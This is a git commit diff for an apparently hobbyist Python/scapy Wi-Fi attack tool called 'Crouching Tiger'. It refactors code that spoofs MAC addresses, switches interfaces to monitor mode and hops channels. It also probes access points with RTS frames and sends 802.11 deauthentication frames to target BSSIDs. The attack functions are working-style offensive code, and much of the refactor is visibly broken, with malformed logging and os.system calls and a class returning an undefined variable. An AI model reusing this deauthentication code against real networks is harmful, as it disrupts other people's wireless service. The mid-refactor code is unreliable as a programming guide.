Commiting to classified_dev

This commit is contained in:
anoduck 2023-10-20 02:52:08 -04:00
parent d28dd24d75
commit 598bd784a3
4 changed files with 246 additions and 225 deletions

434
ctiger.py
View file

@ -26,6 +26,10 @@ from scapy.config import Conf as scapyconfig
from scapy.layers.eap import EAPOL
from scapy.utils import PcapWriter
from getmac import get_mac_address
# Import Faker.
from faker import Faker
# Import the WifiESSID class from Faker Wi-Fi ESSID.
from faker_wifi_essid import WifiESSID
# import scapy_ex
# from scapy_ex import Dot11Elt
from art.art import tprint
@ -56,6 +60,9 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# scapy.config.Conf.layers.filter([Dot11, Dot11Beacon, Dot11Elt,
# RadioTap, Dot11Deauth, Dot11FCS, EAPOL])
fake = Faker()
fake.add_provider(WifiESSID)
# ------------------------------------------------------------
# ██████╗███████╗ ██████╗ ███████╗██████╗ ███████╗ ██████╗
# ██╔════╝██╔════╝██╔════╝ ██╔════╝██╔══██╗██╔════╝██╔════╝
@ -72,7 +79,6 @@ cfg = """# Crouching Tiger Config File
# General Settings
# ----------------
interface = string(default='wlan0')
sniff_count = integer(min=10, max=10, default=10)
logging_level = option('INFO', 'DEBUG', default='DEBUG')
log_file = string(default='/var/log/ctiger.log')
@ -190,7 +196,52 @@ def PRN2(pkt):
return pkt_list
# ---------------------------------------------------------------------------------
# ------------------------------------------------------------------
# ███████╗████████╗██████╗ █████╗ ██╗███╗ ██╗███████╗██████╗
# ██╔════╝╚══██╔══╝██╔══██╗██╔══██╗██║████╗ ██║██╔════╝██╔══██╗
# ███████╗ ██║ ██████╔╝███████║██║██╔██╗ ██║█████╗ ██████╔╝
# ╚════██║ ██║ ██╔══██╗██╔══██║██║██║╚██╗██║██╔══╝ ██╔══██╗
# ███████║ ██║ ██║ ██║██║ ██║██║██║ ╚████║███████╗██║ ██║
# ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
# ----------------------------------------------------------------
def strainer(pkt) -> None:
if pkt[Dot11].type == 0 and pkt[Dot11].subtype == 4:
bssid = pkt[Dot11FCS].addr2
log.info('BSSID for strainer: ' + str(bssid))
# iface = get_working_if()
macaddr = NetDev.__dict__['macaddr']
log.debug('Local Macaddr is: ', macaddr)
new_pkt = RadioTap()/Dot11(proto=0, type=1, subtype=11,
addr1=bssid,
addr2=macaddr,
ID=65535)
log.debug('Sending RTS frame to ' + str(bssid) + ' with type 11')
res = sr1(new_pkt, timeout=2, verbose=0, retry=0)
if res:
if res[Dot11].type == 1 and res[Dot11].subtype == 12:
log.debug('Recieved CTS packet.')
log.info('Intercepted CTS from: ' + bssid)
dbm_signal = pkt.dBm_AntSignal
channel = extract_channel(res[Dot11])
scan_df = Purge.__dict__['scan_df']
scan_df.loc[bssid] = ['N/A', dbm_signal, channel, 'N/A']
class NetDev:
def __init__(self, name: str, macaddr,
mon_if: str, channels: str, mon_crtd: str) -> None:
self.name = name
self.macaddr = macaddr
self.mon_if = mon_if
self.channels = channels
self.mon_crtd = mon_crtd
# type: ignore
def macaddr(self) -> str:
self.macaddr = fake.wifi_essid()
return self.macaddr
# ---------------------------------------------------------------------------------
# ███████╗███████╗████████╗██╗ ██╗██████╗ ███╗ ███╗ ██████╗ ███╗ ██╗
# ██╔════╝██╔════╝╚══██╔══╝██║ ██║██╔══██╗ ████╗ ████║██╔═══██╗████╗ ██║
# ███████╗█████╗ ██║ ██║ ██║██████╔╝ ██╔████╔██║██║ ██║██╔██╗ ██║
@ -198,88 +249,112 @@ def PRN2(pkt):
# ███████║███████╗ ██║ ╚██████╔╝██║ ██║ ╚═╝ ██║╚██████╔╝██║ ╚████║
# ╚══════╝╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝
# ---------------------------------------------------------------------------------
def create_if(interface, mon_crtd, macaddr):
try:
os.system('ip link set ' + interface + ' up')
os.system('iw dev ' + interface + ' interface add ' + mon_crtd + ' type monitor')
log.debug('Created ' + mon_crtd)
os.system('ip link set ' + mon_crtd + ' down')
os.system('ip link set ' + mon_crtd + ' address ' + macaddr)
log.debug('Set device address to ' + macaddr)
os.system('ip link set ' + mon_crtd + ' up')
log.debug('Set device up')
os.system('iw set reg US')
log.debug('Set device registry to US')
log.info('Device is fully configured and up')
return True
except os.error as e:
log.debug('Failed to create ' + mon_crtd, e)
print('Creation of new monitor interface failed:', e)
sys.exit(1)
def switch_if(interface, macaddr):
try:
os.system('ip link set ' + interface + ' down')
log.debug('Set device down')
os.system('ip link set ' + interface + ' address ' + macaddr)
log.debug('Set device address to ' + macaddr)
os.system('iw dev ' + interface + ' set type monitor')
log.debug(interface + ' switched to monitor')
os.system('ip link set ' + interface + ' up')
# print('reg')
# os.system('iw set reg US')
# sleep(1)
# log.debug('Set device registry to US')
scapyconfig.iface = interface
log.info('Set scapy config interface to: ' + interface)
log.info('Device is fully configured and up')
return True
except os.error as e:
log.debug('Failed to switch ' + interface + ' type', e)
print('Failed to change ' + interface + ' mode', e)
sys.exit(1)
def start_monitor(interface, mon_type, macaddr):
"""
Starts a monitor interface based on the given arguments.
Args:
interface (str): The name of the interface to create the monitor interface from.
mon_type (str): The type of monitor interface to create or switch to.
Possible values are "create" or "switch".
Returns:
str: The name of the created or switched monitor interface.
"""
log.debug('mac_address type: ' + str(type(macaddr)))
log.debug('mac_address: ' + str(macaddr))
log.info('Starting monitor interface')
mon_crtd = interface + 'mon'
if mon_type == 'create':
create_if(interface, mon_crtd, macaddr)
if_mon = mon_crtd
return if_mon
elif mon_type == 'switch':
if switch_if(interface, macaddr):
return interface
else:
log.debug('Something got fucked with the interface')
def create_if(self) -> bool:
try:
os.system(f'ip link set {self.name} up')
os.system(f'iw dev {self.name} interface add {self.mon_crtd} type monitor')
log.debug('Created ', self.mon_crtd)
os.system(f'ip link set {self.mon_crtd} down')
os.system(f'ip link set {self.mon_crtd} address {self.macaddr}')
log.debug('Set device address to ', self.macaddr)
os.system(f'ip link set {self.mon_crtd} up')
log.debug('Set device up')
os.system('iw set reg US')
log.debug('Set device registry to US')
log.info('Device is fully configured and up')
return True
except os.error as e:
log.debug('Failed to create ', self.mon_crtd, e)
print('Creation of new monitor self.name failed:', e)
sys.exit(1)
else:
Exception('Invalid monitor type')
log.debug('Invalid monitor type')
sys.exit(1)
def switch_if(self) -> bool:
try:
os.system(f'ip link set {self.name} down')
log.debug('Set device down')
os.system(f'ip link set {self.name} address {self.macaddr}')
log.debug('Set device address to ', self.macaddr)
os.system(f'iw dev {self.name} set type monitor')
log.debug(self.name, ' switched to monitor')
os.system(f'ip link set {self.name} up')
# (below) setting registry is known to cause issues.
os.system('iw set reg US')
log.debug('Set device registry to US')
scapyconfig.iface = self.name
log.info('Set scapy config self.name to: ', self.name)
log.info('Device is fully configured and up')
return True
except os.error as e:
log.debug('Failed to switch ', self.name, ' type', e)
print('Failed to change ', self.name, ' mode', e)
sys.exit(1)
def start_monitor(self) -> str:
"""
Starts a monitor self.name based on the given arguments.
Args:
interface (str): The name of the interface to create the monitor interface from.
mon_type (str): The type of monitor interface to create or switch to.
Possible values are "create" or "switch".
Returns:
str: The name of the created or switched monitor interface.
"""
self.name = Purge.__dict__['name']
self.mon_type = Purge.__dict__['mon_type']
log.debug('mac_address type: ', str(type(self.macaddr)))
log.debug('mac_address: ', str(self.macaddr))
log.info('Starting monitor interface')
self.mon_crtd = self.name + 'mon'
if self.mon_type == 'create':
NetDev.create_if(self.name)
if_mon = self.mon_crtd
return if_mon
elif self.mon_type == 'switch':
if self.switch_if():
return self.name
else:
log.debug('Something got fucked with the interface')
sys.exit(1)
else:
Exception('Invalid monitor type')
log.debug('Invalid monitor type')
sys.exit(1)
# ---------------------------------------------------------------------------
# ██████╗██╗ ██╗ ██████╗ ██╗ ██╗███╗ ██╗███╗ ██╗███████╗██████╗
# ██╔════╝██║ ██║ ██╔══██╗██║ ██║████╗ ██║████╗ ██║██╔════╝██╔══██╗
# ██║ ███████║ ██████╔╝██║ ██║██╔██╗ ██║██╔██╗ ██║█████╗ ██████╔╝
# ██║ ██╔══██║ ██╔══██╗██║ ██║██║╚██╗██║██║╚██╗██║██╔══╝ ██╔══██╗
# ╚██████╗██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║██║ ╚████║███████╗██║ ██║
# ╚═════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
# ----------------------------------------------------------------------------
def channel_runner(self) -> None:
log.info('Channel Runner NG started.')
log.info('Preliminary channel list: ', str(self.channels))
chanlist = self.channels.split(',')
chlist = list(set(chanlist))
log.info('Channel list: ', str(chlist))
chans = [int(chan) for chan in chlist]
thread = threading.current_thread()
print(f'name={thread.name}, daemon={thread.daemon}')
while True:
ichan = choice(chans)
os.system(f'iw dev {self.mon_if} set channel {str(ichan)}')
# log.debug('Channel set to ', str(ichan))
sleep(14.7)
def stop_monitor(if_mon):
try:
os.system("iw dev " + if_mon + " del")
return True
except:
return False
def signal_handler(signal, frame) -> None:
print('You pressed Ctrl+C!')
log.info('Shutting down')
df2w = Purge.__dict__['scan_df']
df2w.to_csv('ct_purge.csv')
log.info('Saved results to: ',
Purge.__dict__['valid_file'])
log.info('Going Down!!')
sys.exit(0)
# ██████╗ ██╗ ██╗██████╗ ██████╗ ███████╗
@ -291,87 +366,12 @@ def stop_monitor(if_mon):
# -------------------------------------------
class Purge:
def __init__(self, **kwargs) -> None:
self.interface = kwargs.get("interface")
self.mon_type = kwargs.get("mon_type")
self.valid_file = kwargs.get("valid_file")
self.channels = kwargs.get("channels")
self.scan_df = get_df()
self.macaddr = gen_mac()
self.interface = kwargs.get('interface')
self.mon_type = kwargs.get('mon_type')
self.valid_file = kwargs.get('valid_file')
self.channels = kwargs.get('channels')
self.log = log
# ------------------------------------------------------------------
# ███████╗████████╗██████╗ █████╗ ██╗███╗ ██╗███████╗██████╗
# ██╔════╝╚══██╔══╝██╔══██╗██╔══██╗██║████╗ ██║██╔════╝██╔══██╗
# ███████╗ ██║ ██████╔╝███████║██║██╔██╗ ██║█████╗ ██████╔╝
# ╚════██║ ██║ ██╔══██╗██╔══██║██║██║╚██╗██║██╔══╝ ██╔══██╗
# ███████║ ██║ ██║ ██║██║ ██║██║██║ ╚████║███████╗██║ ██║
# ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
# ----------------------------------------------------------------
def strainer(pkt):
if pkt[Dot11].type == 0 and pkt[Dot11].subtype == 4:
bssid = pkt[Dot11FCS].addr2
log.info('BSSID for strainer: ' + str(bssid))
iface = get_working_if()
log.debug('Working interface is: ', iface)
if iface == 'lo':
return
macaddr = get_mac_address(iface)
log.debug('Local Macaddr is: ', macaddr)
new_pkt = RadioTap()/Dot11(proto=0, type=1, subtype=11,
addr1=bssid,
addr2=macaddr,
ID=65535)
log.debug('Sending RTS frame to ' + str(bssid) + ' with type 11')
res = sr1(new_pkt, timeout=2, verbose=0, retry=0)
if res:
if res[Dot11].type == 1 and res[Dot11].subtype == 12:
log.debug('Recieved CTS packet.')
log.info('Intercepted CTS from: ' + bssid)
dbm_signal = pkt.dBm_AntSignal
channel = extract_channel(res[Dot11])
scan_df.loc[bssid] = ['N/A', dbm_signal, channel, 'N/A']
def df_writer(self):
if self.scan_df.empty:
exit(0)
else:
df_towrite = self.scan_df
df_towrite.to_csv(self.valid_file)
print('results written to file ' + self.valid_file)
exit(0)
# ---------------------------------------------------------------------------
# ██████╗██╗ ██╗ ██████╗ ██╗ ██╗███╗ ██╗███╗ ██╗███████╗██████╗
# ██╔════╝██║ ██║ ██╔══██╗██║ ██║████╗ ██║████╗ ██║██╔════╝██╔══██╗
# ██║ ███████║ ██████╔╝██║ ██║██╔██╗ ██║██╔██╗ ██║█████╗ ██████╔╝
# ██║ ██╔══██║ ██╔══██╗██║ ██║██║╚██╗██║██║╚██╗██║██╔══╝ ██╔══██╗
# ╚██████╗██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║██║ ╚████║███████╗██║ ██║
# ╚═════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
# ----------------------------------------------------------------------------
def channel_runner(self):
log.info('Channel Runner NG started.')
log.info('Preliminary channel list: ' + str(self.channels))
log.debug('Preliminary list type is: ' + str(type(self.channels)))
chanlist = self.channels.split(',')
chlist = list(set(chanlist))
log.info('Channel list: ' + str(chlist))
chans = [int(chan) for chan in chlist]
thread = threading.current_thread()
print(f'name={thread.name}, daemon={thread.daemon}')
while True:
ichan = choice(chans)
os.system('iw dev ' + self.mon_if + ' set channel ' + str(ichan))
# log.debug('Channel set to ' + str(ichan))
sleep(14.7)
def signal_handler(signal, frame):
print('You pressed Ctrl+C!')
log.info('Shutting down')
Purge.scan_df.to_csv('ct_purge.csv')
log.info('Saved results to: ' + Purge.valid_file)
log.info('Going Down!!')
sys.exit(0)
# -----------------------------------------------------------------------------
# ███╗ ███╗ █████╗ ██████╗ ██████╗ ██╗ ██╗██████╗ ██████╗ ███████╗
# ████╗ ████║██╔══██╗██╔════╝ ██╔══██╗██║ ██║██╔══██╗██╔════╝ ██╔════╝
@ -380,21 +380,23 @@ class Purge:
# ██║ ╚═╝ ██║██║ ██║╚██████╗ ██║ ╚██████╔╝██║ ██║╚██████╔╝███████╗
# ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝
# ----------------------------------------------------------------------------
async def mac_purge(self):
signal.signal(signal.SIGINT, self.signal_handler)
async def mac_purge(self) -> None:
signal.signal(signal.SIGINT, signal_handler)
print('Enter Ctrl+C TWICE to fully stop the script.')
self.mon_if = start_monitor(self.interface, self.mon_type, self.macaddr)
log.info('interface ' + self.mon_if + ' is up and running.')
device = NetDev
self.mon_if = device.start_monitor
log.info('interface ', self.mon_if, ' is up and running.')
self.scan_df = DataFrame()
self.valid_file = self.valid_file
log.info('We will be writing captured macs to ' + self.valid_file)
chop = asyncio.to_thread(self.channel_runner, self.channels)
log.info('We will be writing captured macs to ', self.valid_file)
chop = asyncio.to_thread(NetDev.channel_runner) # type: ignore
chopper = asyncio.create_task(chop)
log.info('Channel runner started.')
await asyncio.sleep(0)
while True:
log.info('starting sniffer')
asniff = AsyncSniffer(iface=self.mon_if,
prn=self.strainer,
prn=strainer,
store=False, monitor=True)
asniff.start()
log.info('asniffer started')
@ -437,12 +439,12 @@ async def sniff_stop(pkt):
# ----------------------------------------------------------------------------
async def set_channel(interface, channel):
try:
os.system('iw dev ' + interface + ' set channel ' + channel)
os.system('ip link set ' + interface + ' up')
log.info('Channel set to ' + channel)
os.system('iw dev ', interface, ' set channel ', channel)
os.system('ip link set ', interface, ' up')
log.info('Channel set to ', channel)
except:
log.debug('Failed to set channel on ' + interface)
print('Failed to set channel on ' + interface)
log.debug('Failed to set channel on ', interface)
print('Failed to set channel on ', interface)
# -----------------------------------------------------------------------------
@ -458,13 +460,13 @@ async def feed_gather(mon_dev, targ):
fg_asf = await AsyncSniffer(stop_filter=sniff_stop, iface=mon_dev, monitor=True)
log.info('Starting pkt gather')
await fg_asf.start()
# log.info('Setting mon_dev channel to ' + channel)
# log.info('Setting mon_dev channel to ', channel)
pkt = RadioTap()/Dot11(type=0, subtype=4, addr1="ff:ff:ff:ff:ff:ff", addr2=targ, addr3=targ)/Dot11Deauth()
log.debug('sending deauth to ' + targ + ' with type 4')
log.debug('sending deauth to ', targ, ' with type 4')
sendp(pkt, iface=mon_dev, verbose=0)
await asyncio.sleep(1)
pkt = RadioTap()/Dot11(type=0, subtype=12, addr1="ff:ff:ff:ff:ff:ff", addr2=targ, addr3=targ)/Dot11Deauth()
log.debug('sending deauth to ' + targ + ' with type 12')
log.debug('sending deauth to ', targ, ' with type 12')
sendp(pkt, iface=mon_dev, verbose=0)
await asyncio.sleep(1)
@ -473,7 +475,7 @@ def grab_macs(pkt):
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype == 4:
if pkt.info != '':
log.debug('mac: ' + pkt.addr2)
log.debug('mac: ', pkt.addr2)
return pkt.addr2
@ -493,8 +495,8 @@ async def chan_hopper(mon_dev, channels):
chans = [int(chan) for chan in chlist]
while True:
ichan = choice(chans)
os.system('iw dev ' + mon_dev + ' set channel ' + str(ichan))
log.debug('Channel set to ' + str(ichan))
os.system('iw dev ', mon_dev, ' set channel ', str(ichan))
log.debug('Channel set to ', str(ichan))
await asyncio.sleep(4.7)
# return ichan
@ -514,11 +516,11 @@ async def attack(mon_dev, scan_file):
tpairs = targets.drop(columns=['crypt', 'ssid'])
pd_chan_list = tpairs.channel.to_list()
channels = list(set(pd_chan_list))
log.debug('Channel Type: ' + str(type(channels)))
log.debug('Channel Type: ', str(type(channels)))
pd_bssid_list = tpairs.bssid.to_list()
bssids = list(set(pd_bssid_list))
log.info('Channel list: ' + str(channels))
log.info('BSSID list: ' + str(bssids))
log.info('Channel list: ', str(channels))
log.info('BSSID list: ', str(bssids))
asniff = AsyncSniffer(iface=mon_dev, prn=grab_macs, monitor=True, store=False)
asniff.start()
log.info('Starting channel hopper')
@ -528,7 +530,7 @@ async def attack(mon_dev, scan_file):
with await asniff.results() as ares:
for row in ares:
if row[1] in targets:
log.info('Found target: ' + row[1])
log.info('Found target: ', row[1])
asyncio.create_task(feed_gather(mon_dev, row))
await asyncio.sleep(1)
@ -546,13 +548,14 @@ def start_attack(mondev, scan_file):
# ██████╔╝██║ ██║███████╗██║ ╚═╝ ██║╚██████╔╝██║ ╚████║
# ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝
# ----------------------------------------------------------------------------
def proc_attack(interface, scan_file, mon_type, daemon):
def proc_attack(interface, scan_file, mon_type):
mon_dev = start_monitor(interface, mon_type)
# daemon = Daemonize(app=__name__, pid='/tmp/ctiger.pid',
# action=asyncio.run(attack(mon_dev, scan_file)))
mp.set_start_method('spawn')
attack_daemon = mp.Process(target=start_attack, args=(mon_dev, scan_file),
name='attack_daemon', daemon=True)
daemon = False
if daemon:
log.info('Daemonizing & sending to background...')
attack_daemon.start()
@ -570,20 +573,22 @@ def proc_attack(interface, scan_file, mon_type, daemon):
# ███████║╚██████╗██║ ██║██║ ╚████║
# ╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═══╝
# -------------------------------------------------------------
def scan_scn(interface, save_results, rfile, sniff_count):
def scan_scn(interface, save_results, rfile):
scan_df = get_df()
# ssocket = conf.L2socket(iface=if_mon)
sniff_ses = sniff(prn=PRN2, iface=interface, count=sniff_count, monitor=True)
sniff_ses = sniff(prn=PRN2, iface=interface,
count=10, monitor=True)
print(str(sniff_ses))
if save_results:
scan_df.to_csv(rfile)
print('results written to file ' + rfile)
print('results written to file ', rfile)
else:
print(scan_df)
# stop_monitor(if_mon)
print('Done')
# -------------------------------------------------------------
# -------------------------------------------------------------
# ██████╗ ███████╗████████╗ ██████╗ ███████╗
# ██╔════╝ ██╔════╝╚══██╔══╝ ██╔══██╗██╔════╝
@ -592,7 +597,7 @@ def scan_scn(interface, save_results, rfile, sniff_count):
# ╚██████╔╝███████╗ ██║ ██████╔╝██║
# ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚═╝
# -------------------------------------------------------------
def get_df():
class DataFrame:
"""
Initializes and returns an empty pandas DataFrame object.
@ -609,35 +614,13 @@ def get_df():
Returns:
scan_df (pandas DataFrame): An empty DataFrame object with the specified columns and index.
"""
global scan_df
scan_df = pd.DataFrame(columns=['BSSID', 'SSID', 'dBm_Signal', 'Channel', 'Crypto'])
scan_df.set_index("BSSID", inplace=True)
return scan_df
# -------------------------------------------------------------
# ██████╗ ███████╗███╗ ██╗ ███╗ ███╗ █████╗ ██████╗
# ██╔════╝ ██╔════╝████╗ ██║ ████╗ ████║██╔══██╗██╔════╝
# ██║ ███╗█████╗ ██╔██╗ ██║ ██╔████╔██║███████║██║
# ██║ ██║██╔══╝ ██║╚██╗██║ ██║╚██╔╝██║██╔══██║██║
# ╚██████╔╝███████╗██║ ╚████║ ██║ ╚═╝ ██║██║ ██║╚██████╗
# ╚═════╝ ╚══════╝╚═╝ ╚═══╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝
# ----------------------------------------------------------------
def GetMAC(iface):
global macaddr
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', bytes(iface, 'utf-8')[:15]))
return ':'.join('%02x' % b for b in info[18:24])
macaddr = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
log.debug('Acquired random mac value: ' + macaddr)
return macaddr
def gen_mac():
global macaddr
mac_address = [randint(0x00, 0xff) for _ in range(6)]
macaddr = ':'.join(['{:02x}'.format(byte) for byte in mac_address])
return macaddr
def __init__(self):
self.scan_df = pd.DataFrame(columns=['BSSID', 'SSID',
'dBm_Signal', 'Channel',
'Crypto'])
self.scan_df.set_index("BSSID", inplace=True)
return scan_df
# -------------------------------------------------------------------
@ -649,7 +632,7 @@ def gen_mac():
# ╚═╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝
# -------------------------------------------------------------------
# This is some fancy shit.
def process_args(args: argparse.Namespace, config):
def process_args(args: argparse.Namespace) -> None:
"""
Processes the command line arguments.
@ -671,13 +654,21 @@ def process_args(args: argparse.Namespace, config):
match args.module:
case "att":
log.info('Starting attack formation...')
proc_attack(args.interface, args.scan_file, args.mon_type, config['ATTACK']['use_daemon'])
proc_attack(args.interface, args.scan_file, args.mon_type)
case "mac":
log.info('Beginning Mac Purge')
#mon_dev, mon_type, valid_file, channels
#mon_dev, mon_type, valid_file, channels
# local_args = {'interface': args.interface,
# 'mon_type': args.mon_type,
# 'valid_file': args.valid_file,
# 'channels': args.channels}
data = vars(args)
asyncio.run(Purge.mac_purge(**data))
# asyncio.run(Purge.mac_purge(interface=args.interface,
# mon_type=args.mon_type,
# valid_file=args.valid_file,
# channels=args.channels))
case "scn":
log.info('Start scanning...')
if not args.save_results:
@ -685,7 +676,7 @@ def process_args(args: argparse.Namespace, config):
log.debug('Not saving results')
else:
rfile = args.rfile
log.debug('Saving results to ' + rfile)
log.debug('Saving results to ', rfile)
scan_scn(args.interface, args.save_results, rfile)
case _:
ap.print_help()
@ -740,7 +731,7 @@ if not os.path.isfile(config_file):
validator = validate.Validator()
config.validate(validator, copy=True)
config.write()
print("configuration file written to " + config_path)
print("configuration file written to ", config_path)
sys.exit()
else:
config = ConfigObj(config_file, configspec=spec)
@ -777,9 +768,6 @@ else:
ap.add_argument('-i', '--interface', dest='interface',
default=config['interface'],
help='Interface(s) to scan on')
ap.add_argument('-s', '--sniffs', dest='sniff_count', type=int,
default=config['sniff_count'], required=False,
help='Length of time to capture packets')
ap.add_argument('-f', '--file', dest='config_file', default='config_path',
help='configuration file')
ap.add_argument('-l', '--log_level', dest='log_level', default=config['logging_level'],
@ -833,7 +821,7 @@ else:
# parse the args #
##################
args = ap.parse_args(args=None if sys.argv[1:] else ['--help'])
process_args(args, config)
process_args(args)
if __name__ == '__main__':

View file

@ -1930,7 +1930,7 @@
},
"language_info": {
"name": "python",
"version": "3.11.5"
"version": "3.11.6"
},
"orig_nbformat": 4
},

34
poetry.lock generated
View file

@ -62,6 +62,38 @@ files = [
{file = "daemonize-2.5.0.tar.gz", hash = "sha256:dd026e4ff8d22cb016ed2130bc738b7d4b1da597ef93c074d2adb9e4dea08bc3"},
]
[[package]]
name = "faker"
version = "13.16.0"
description = "Faker is a Python package that generates fake data for you."
optional = false
python-versions = ">=3.6"
files = [
{file = "Faker-13.16.0-py3-none-any.whl", hash = "sha256:920f94d5aa865fd922bc29f2cf75c75b4d86b30eec23e7174d7513241b759b05"},
{file = "Faker-13.16.0.tar.gz", hash = "sha256:25c5be99bc5fd8676eea8c1490e0de87f6d9734651c7af2cefc99b322b2936f4"},
]
[package.dependencies]
python-dateutil = ">=2.4"
[[package]]
name = "faker-wifi-essid"
version = "0.4.1"
description = "Faker provider for Wi-Fi ESSIDs."
optional = false
python-versions = "<4,>=3.7"
files = [
{file = "faker_wifi_essid-0.4.1-py3-none-any.whl", hash = "sha256:857d2fca6f1d0571a7fb732c80d300e8f4c1e2cffc9c69eae1ad972a6514b99f"},
{file = "faker_wifi_essid-0.4.1.tar.gz", hash = "sha256:8d536351a28b83bb99d3ad204df38ab38478e53b5b83a1f138d6e33b987e417b"},
]
[package.dependencies]
Faker = ">=4.1,<14.0"
[package.extras]
docs = ["Sphinx (>=3.2)", "sphinx-rtd-theme (>=0.5.0)"]
tests = ["flake8", "pylint", "tox"]
[[package]]
name = "getmac"
version = "0.9.4"
@ -294,4 +326,4 @@ files = [
[metadata]
lock-version = "2.0"
python-versions = "^3.11"
content-hash = "702716ded3abdf2ecab3886daff93dead616d85f74182b162e46ea2dd1dcf837"
content-hash = "fe0ddb56e36b45960c6cd428789caed368f5ce252415cfebb66758a674e65d24"

View file

@ -17,6 +17,7 @@ pandas = "^2.1.0"
daemon = "^1.2"
daemonize = "^2.5.0"
getmac = "^0.9.4"
faker-wifi-essid = "^0.4.1"
[build-system]